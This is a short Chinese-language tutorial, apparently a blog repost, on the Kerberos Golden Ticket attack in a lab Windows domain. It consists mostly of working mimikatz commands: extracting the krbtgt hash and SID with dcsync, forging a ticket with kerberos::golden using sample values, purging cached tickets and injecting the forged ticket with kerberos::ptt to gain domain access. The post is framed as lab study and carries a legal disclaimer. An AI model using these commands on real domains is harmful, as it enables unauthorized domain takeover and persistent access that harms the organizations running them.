【知识整理】域渗透之黄金票据(Golden ticket)

admin
admin
admin
102523
文章
87
评论
2023年11月7日09:42:34评论37 views字数 761阅读2分32秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

黄金票据(Golden Ticket)是基于Kerberos认证的一种攻击方式,常用来做域控权限维持。当攻击者获取到域内krbtgt帐户的SID和Hash,就可以制作黄金票据。
文章参考:
【搭建合集】Windows域环境搭建
【知识整理】域渗透之Hash传递(Pass The Hash)
0X02 实验环境
Windows Server 2008DC):
192.168.64.130

mimikatz 2.2.0

Windows 7:

192.168.64.131

mimikatz 2.2.0
0X03 实验开始
在域控服务器(Windows Server 2008(DC))上获取krbtgt帐户的SID和Hash:Lasdump::dcsync /domain:test.com(domain) /user:krbtgt(username)

【知识整理】域渗透之黄金票据(Golden ticket)

制作黄金票据,需管理员运行mimikatzKerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-1406194077-816462478-1442205416 /krbtgt:39dff60b4b2db4e384684eab26cc7900 /ticket:123.kirbi

注:SID值最后面的502不需要添加
【知识整理】域渗透之黄金票据(Golden ticket)

【知识整理】域渗透之黄金票据(Golden ticket)

清空本地票据缓存klist purge(CMD)Kerberos::purge(mimikatz)
【知识整理】域渗透之黄金票据(Golden ticket)
【知识整理】域渗透之黄金票据(Golden ticket)
【知识整理】域渗透之黄金票据(Golden ticket)

导入黄金票据(Windows 7

【知识整理】域渗透之黄金票据(Golden ticket)

kerberos::ptt 123.kirbi
【知识整理】域渗透之黄金票据(Golden ticket)

退出mimikatz exit 获得权限

【知识整理】域渗透之黄金票据(Golden ticket)

原文始发于微信公众号(皓月的笔记本):【知识整理】域渗透之黄金票据(Golden ticket)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月7日09:42:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【知识整理】域渗透之黄金票据(Golden ticket)http://cn-sec.com/archives/2182278.html

发表评论

匿名网友 填写信息